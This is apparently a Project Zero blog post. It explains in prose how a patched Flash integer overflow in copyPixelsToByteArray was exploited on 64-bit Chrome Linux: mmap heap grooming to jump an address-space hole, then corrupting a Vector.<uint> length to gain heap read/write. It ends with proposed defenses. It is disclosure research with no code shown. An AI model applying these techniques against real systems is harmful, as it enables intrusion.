Posted by Chris Evans, Kidnapper of RIP
A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones are a double free in the RTMP protocol, or an integer overflow concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline.
Prelude
Before we get started, though, it’s worth briefly noting why there is so much value in writing an exploit. Finding and eliminating bugs obviously improves software correctness, but writing exploits is always a significant learning opportunity. Throughout the history of the security industry, there’s a long track record of offense driving defense, leading to technologies such as stack canaries, NX support in processors and ASLR.
Project Zero is not just a bug hunting initiative. We’re doing our part to continue the tradition of practical and public research of exploitation techniques -- and deriving defenses from them. For example, our glibc defensive patch was accepted as a follow-on from our glibc exploit.
The case of this particular exploit starts with some irony on account of my overly hasty initial triage of the bug based on instincts which were later proved wrong by a more in-depth analysis of exploitation opportunities. In the bug history, you can see the claim “almost certainly 64-bit only” (wrong!) and then “does not work in Chrome 64-bit Linux”. We learned not to declare anything as unexploitable in our previous post about exploiting a subtle condition in glibc. Therefore, I had to declare shenanigans on myself and tackle the challenge: exploit this bug on Chrome 64-bit Linux.
The bug
The bug is triggered by calling BitmapData.copyPixelsToByteArray() with a reference to a ByteArray that has its position property set very large -- close to 2^32. This results in an integer overflow in 32-bit arithmetic. This occurs even on 64-bit because the relevant positions and length variables are (quite reasonably) stored in 32-bit variables. The code then believes that it can copy the pixels, starting to write them at position, and stay within the bounds of the buffer. Instead, a buffer overflow occurs. On 32-bit, the out-of-bounds write will be written before the start of the buffer because the pointer will wrap. On 64-bit, things are not as kind to the attacker. On a typical 64-bit Linux process setup with a 1MB buffer, the situation will look like this:
… | buffer: 1MB | heap, libs, binary | !!
The out-of-bounds write (in red) is at approximately buffer + 4GB. This will not wrap around the massive 64-bit address space, leading to a write way off in unmapped space. Insta-crash. The most obvious way to avoid the crash is to make the buffer massive, almost 4GB, leading to this situation:
… | buffer: 4GB | !! heap, libs, binary |
This is readily exploitable. However, 64-bit Chrome on Linux has a defensive measure where the amount of mapped address space is limited to 4GB. So the large buffer allocation will fail and prevent that particular attack.
The heap groom
We’re going to need a trick to exploit this without slamming into the 4GB address space limit. The breakthrough -- that did not occur to me before attempting to develop an exploit -- comes when we realize that we don’t need to have the address space contiguously mapped. The out-of-bounds write will happily still go ahead even if it “jumps over” a hole in the address space. By having a hole in the address space, perhaps we can usefully trigger the corruption with less than 4GB mapped.
But how do we put this hole where we want it? Looking at how the Flash allocator works using the strace system tool, we see that very large allocations are serviced using unhinted mmap(). The Linux standard algorithm for servicing unhinted mmap() calls is to stack them adjacent and downwards in address space, as long as there isn’t a hole that can satisfy the request. So let’s see what happens when we allocate two 1GB chunks:
… | buffer2: 1GB | buffer1: 1GB | heap, libs, binary |
And the free the first one (a direct munmap() call is seen):
… | buffer2: 1GB | 1GB hole | heap, libs, binary |
And then allocate a 2GB buffer (too big to fit in the hole):
… | buffer3: 2GB | buffer2: 1GB | 1GB hole | !! heap, libs, binary |
Aha! We’ve managed to engineer a situation where we’ve never had more than 4GB of address space mapped at any given moment, and at the end, a corruption at buffer3 + 4GB will land right in a writable region: the heap.
The corruption target
Now that we have a reasonably controlled memory corruption situation, we need to pick something to corrupt. As is pretty standard in modern heap buffer overflow exploitation in a scripting environment, we’re going to try and clobber a length of an array-like object. If we clobber any such length to be larger, we will then be able to read and write arbitrary relative heap memory. Once we’ve achieved such a powerful primitive, it’s essentially game over. Successful exploitation is pretty much assured: defeat ASLR by reading the value of a vtable and then write a new vtable that causes execution redirection to a sequence of opcodes that we choose.
We decide to corrupt a Vector.<uint> buffer object. This is a fairly standard, documented technique. I recommend Haifei Li’s excellent paper as background reading. Corrupting this buffer object is an obvious target because of three properties it possesses:
- The attacker can choose arbitrary sizes for these objects, meaning there is a lot of control over where in the heap they are placed relative to the pending heap corruption.
- The object starts with a length field, and corrupting it results in arbitrary heap relative read/write being exposed to script.
- The object is resilient to corruption in general. Aside from the length field, there is just a single pointer and trashing this pointer does not affect the ability to use the Vector, or otherwise cause noticeable stability issues during the course of exploitation. (We could even restore its value post-exploitation if we wished.)
To proceed, we simply create many (32) Vector.<uint> objects, all with buffers sized at about 2MB. These typically end up being stacked downwards at the top of the 1GB hole. In reality, the 1GB and 2GB allocations end up being a little larger than expected under the covers. This means that the corruption address of buffer3 + 4GB actually ends up corrupting objects within the 1GB hole instead of after it. This is ideal because we can make sure that only our large buffers are corrupted. In terms of the actual data to write, we just use the default values in an empty BitmapData, which are 0xffffffff (white pixels with a full alpha channel). 0xffffffff is a plenty large enough length to proceed with the exploit!
Proceeding onwards
There is nothing particularly exciting or unique about how the exploit proceeds to demonstrate code execution, so we’ll skip the lengthy explanation here. I’ve made an attempt to fully comment the exploit source code, so if you want to continue to follow along I recommend you read the materials attached to the public bug.
The only part I’d flag as mildly interesting -- because it differs from the previously quoted paper -- is how we get known data at a known heap address. We do it with a Vector.<uint> object again. Each of these is in fact a pair of objects: a script object, which is a fixed sized and contains metadata; and the buffer object which contains the arbitrary data prefixed by the length. The script object forms a distinct pattern in memory and also contains a pointer to the buffer object. By locating any Vector.<uint> script object, we can then use a raw memory edit to change a property of the object. This property change will be visible to ActionScript so we then know which handle corresponds to a buffer at which raw address.
Conclusions, and turning what we’ve learned into generic defenses
Various technologies would have changed the exploitation landscape here, and can now be investigated in more detail:
- Randomized placement of large memory chunks. Non-deterministic placement of large allocations would have broken the heap grooming aspect of the exploit.
- Isolation of Vector.<uint> buffers. As we’ve seen, corruption of these buffers is an extremely dangerous condition. Some of the most recent advances in memory corruption defenses have been “isolated” or “partitioned” heaps. These technologies seem applicable here. (They would need to be applied not just to the Vector buffers, but to the general case: partitioning off read/write objects where the attacker controls both the size and the content.)
Given the open-source nature of the ActionScript engine, and the open-source nature of some potentially helpful technologies, a prototype of a generic defense is now on the Project Zero TODO list!
0 Comments:
Post a Comment